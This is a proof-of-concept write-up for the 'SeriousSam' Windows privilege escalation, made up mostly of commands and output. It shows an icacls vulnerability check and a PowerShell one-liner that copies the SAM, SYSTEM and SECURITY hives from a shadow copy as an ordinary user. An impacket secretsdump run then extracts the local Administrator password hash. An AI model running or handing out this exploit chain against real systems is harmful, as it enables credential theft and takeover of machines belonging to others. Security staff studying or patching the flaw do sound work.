SeriousSam PS POC

For this privesc to work System Protection requires to of been turned on, and a restore point needs to of been created

For lab
Control Panel -> System & Security -> System -> System Protection – turn protection on then Create restore point

To check if a system is vulnerable

C:\Users\User1\Downloads>icacls %windir%\system32\config\sam
C:\Windows\system32\config\sam BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

A system that is not vulnerable will report output like this:
C:\Windows\system32\config\sam: Access is denied.
Successfully processed 0 files; Failed processing 1 files


---------------------

Tested on

C:\Users\User1\Downloads>ver
Microsoft Windows [Version 10.0.19043.1055]


C:\Users\User1\Downloads>net user user1
User name                    User1
Full Name                    User1
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/22/2021 4:49:45 AM
Password expires             9/2/2021 4:49:45 AM
Password changeable          7/22/2021 4:49:45 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/22/2021 12:02:45 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

-----------------------------

PS one liner

powershell.exe -c "[Console]::OpenStandardInput().CopyTo([Console]::OpenStandardOutput())" < "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SAM" > sam | powershell.exe -c "[Console]::OpenStandardInput().CopyTo([Console]::OpenStandardOutput())" < "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM" > SYSTEM | powershell.exe -c "[Console]::OpenStandardInput().CopyTo([Console]::OpenStandardOutput())" < "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SECURITY" > SECURITY


-----------------------------

Verifying files were created

C:\Users\User1\Downloads>dir
 Volume in drive C has no label.
 Volume Serial Number is A640-5015

 Directory of C:\Users\User1\Downloads

07/22/2021  04:49 AM    <DIR>          .
07/22/2021  04:49 AM    <DIR>          ..
07/22/2021  04:50 AM            65,536 sam
07/22/2021  04:50 AM            32,768 SECURITY
07/22/2021  04:50 AM        12,582,912 SYSTEM
               3 File(s)     12,681,216 bytes
               2 Dir(s)  84,641,734,656 bytes free

-----------------------------
               
Reversing with impacket

root@kali:~/Documents/impacket/examples# secretsdump.py -sam /root/Desktop/Sams/3/sam -security /root/Desktop/Sams/3/SECURITY -system /root/Desktop/Sams/3/SYSTEM LOCAL
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xab9c9fa529798baa78650274811fb326
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
